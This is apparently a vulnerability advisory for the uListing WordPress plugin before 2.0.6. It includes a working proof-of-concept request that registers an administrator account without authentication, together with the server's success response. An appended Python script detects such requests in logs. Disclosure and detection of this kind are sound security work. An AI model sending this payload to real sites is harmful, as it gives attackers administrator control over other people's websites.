wpexploit | M0ze | WPEX-ID:856B930E-0E76-4CE5-B714-62ABC6017488
Jul 27, 2021 - 12:00 a.m.

uListing < 2.0.6 - Unauthenticated Privilege Escalation


EPSS: 0.003 (Low), Percentile: 71.3%

An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress. User registration must be allowed on the target website.

PoC | Unauthenticated Privilege Escalation | Request:

POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205

{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"[email protected]","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}


PoC | Unauthenticated Privilege Escalation | Response:

{"errors":[],"message":"Registration completed successfully.","status":"success"}
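
Added example (not part of the original advisory or the plugin's code): a log-review check that flags requests with the shape of the PoC above, a POST to admin-ajax.php with action=stm_listing_register whose JSON body carries a role outside an allowed set. The function names, the ALLOWED_ROLES set and the sample requests are constructed assumptions.

```python
import json
from urllib.parse import urlsplit, parse_qs

REGISTER_ACTION = "stm_listing_register"  # AJAX action named in the PoC request
ALLOWED_ROLES = {"subscriber"}  # assumption: roles visitors may self-register as

def classify(method, target, body):
    """Label one captured request: ignore, ok, malformed or suspicious."""
    parts = urlsplit(target)
    if method.upper() != "POST" or not parts.path.endswith("/admin-ajax.php"):
        return "ignore"
    # The PoC passes the action in the query string; only that shape is checked.
    if REGISTER_ACTION not in parse_qs(parts.query).get("action", []):
        return "ignore"
    try:
        data = json.loads(body)
    except (TypeError, ValueError):
        return "malformed"
    if not isinstance(data, dict):
        return "malformed"
    if "role" not in data:
        return "ok"  # no client-supplied role in the body
    role = data["role"]
    # Anything that is not an allow-listed string (other role, list, null) is flagged.
    if isinstance(role, str) and role.strip().lower() in ALLOWED_ROLES:
        return "ok"
    return "suspicious"

# Constructed sample requests (method, request target, body); not real traffic.
URL = "/wp-admin/admin-ajax.php?action="
SAMPLES = [
    ("POST", URL + "stm_listing_register", '{"login":"alice","email":"alice@example.com"}'),
    ("POST", URL + "stm_listing_register", '{"login":"bob","role":"administrator"}'),
    ("POST", URL + "stm_listing_register", '{"login":"carol","role":["editor"]}'),
    ("POST", URL + "stm_listing_register", "login=dave&role=administrator"),
    ("POST", URL + "heartbeat", "{}"),
    ("GET", URL + "stm_listing_register", ""),
]

def scan(samples):
    """Return the verdict for each sample, in order."""
    return [classify(m, t, b) for m, t, b in samples]

if __name__ == "__main__":
    for (m, t, b), verdict in zip(SAMPLES, scan(SAMPLES)):
        print(f"{verdict:10} {m} {t} {b[:60]}")
```

A "suspicious" verdict is worth correlating with user accounts created on the site at the same time.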
